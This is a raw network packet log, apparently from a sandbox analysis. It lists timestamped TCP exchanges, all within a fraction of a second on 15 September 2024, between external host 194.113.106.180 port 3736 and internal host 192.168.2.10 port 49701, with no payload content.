Sep 15, 2024 15:02:28.134535074 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134547949 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134558916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134571075 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134586096 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134598017 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.134601116 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134613991 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134623051 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.134629965 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134644032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134650946 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.134656906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134670019 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.134674072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134682894 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134690046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134697914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134716988 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.134733915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134741068 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.134808064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134884119 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.134927034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134943008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.134978056 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.135087967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.135118961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.135155916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.135163069 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.135191917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.135236025 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.140947104 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.141107082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.141140938 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.141175985 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.141200066 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.141220093 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.141227961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.141267061 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.141300917 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.141345024 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.142597914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.142648935 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.142649889 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.142700911 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.142719984 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.142736912 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.142765999 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.142772913 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.142787933 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.142808914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.142843008 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.142910004 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.154544115 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.154601097 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.154616117 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.154637098 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.154689074 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.154725075 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.154733896 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.154761076 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.154808998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.154818058 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.154850006 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.159821033 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.159874916 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.159909964 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.159960032 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.160027027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.160062075 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.160096884 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.160108089 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.160132885 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.160142899 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.166220903 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.166276932 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.166277885 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.166310072 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.166361094 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.166366100 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.166399956 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.166435003 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.166450024 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.166469097 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.166501999 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.166515112 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.169873953 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.169907093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.169964075 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.169974089 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.169998884 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170007944 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.170056105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170089006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170097113 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.170125961 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170167923 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.170502901 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170557976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170593023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170639992 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.170726061 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170743942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170762062 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170797110 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170815945 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170825958 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.170896053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170914888 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170948982 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170964003 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.170968056 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.170986891 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.171005011 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.171008110 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.171032906 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.173858881 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.173877954 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.173912048 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.173935890 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.174017906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.174037933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.174072027 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.174082994 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.174092054 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.174105883 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.184228897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.184284925 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.184350967 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.184386969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.184406042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.184422970 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.184425116 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.184442997 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.184457064 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.184465885 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.184493065 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.184504032 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.185597897 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.185642004 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.185693979 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.185702085 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.185714006 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.185733080 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.185751915 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.185760021 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.185765982 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.185774088 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.185827971 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.185873032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.187783957 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.187844038 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.187844038 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.187884092 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.187902927 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.187922001 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.187925100 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.187957048 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.187989950 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.188009024 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.188055038 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.196609020 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.196629047 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.196685076 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.196690083 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.196703911 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.196738958 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.196748972 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.196758032 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.196777105 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.196806908 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.196821928 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.196846962 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.225047112 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225054979 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225061893 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225112915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225121021 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225136042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225142002 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225156069 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225162029 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225167990 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225233078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.225269079 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225270033 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.225275993 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225287914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225296974 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225302935 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225310087 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225322008 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.225338936 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.225353956 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.225599051 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225661993 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225667000 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225711107 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.225713015 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225720882 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225733995 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225740910 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225754023 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.225754976 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225763083 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225768089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.225770950 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.225800991 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.231643915 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.231651068 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.231668949 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.231678963 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.231686115 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.231703043 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.231738091 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.231749058 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.231777906 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.231786013 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.233141899 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.233182907 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.233189106 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.233205080 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.233232021 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.233243942 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.233249903 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.233262062 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.233274937 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.233282089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.233295918 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.233325958 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.248043060 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.248083115 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.248116970 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.248142958 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.248168945 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.248217106 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.248234987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.248253107 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.248270988 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.248275042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.248368025 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.250534058 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.250586987 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.250621080 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.250636101 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.250703096 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.250720978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.250737906 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.250751972 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.250756025 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.250791073 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.257132053 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.257209063 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.257210016 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.257226944 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.257246017 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.257273912 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.257337093 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.257354021 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.257386923 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.257436037 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.257466078 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.260448933 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.260531902 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.260545969 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.260564089 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.260581970 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.260596037 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.260617018 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.260628939 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.260636091 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.260653019 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.260657072 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.260683060 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.260896921 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261007071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261020899 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261049986 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.261059046 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261079073 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261111021 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261125088 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.261128902 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261148930 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261149883 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.261167049 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261182070 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.261183023 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261203051 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261221886 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261240005 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261243105 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.261275053 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.261346102 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261363029 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261394978 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.261410952 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.261437893 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.264653921 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.264667988 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.264702082 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.264723063 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.264743090 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.264764071 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.264780998 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.264801979 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.264820099 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.264822960 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.264838934 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.264882088 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.275708914 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.275727034 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.275782108 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.275793076 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.275821924 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.275839090 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.275856972 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.275891066 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.275902987 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.277472019 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.277533054 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.277559042 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.277574062 CEST	3736	49701	194.113.106.180	192.168.2.10
Sep 15, 2024 15:02:28.277623892 CEST	49701	3736	192.168.2.10	194.113.106.180
Sep 15, 2024 15:02:28.277640104 CEST	3736	49701	194.113.106.180	192.168.2.10
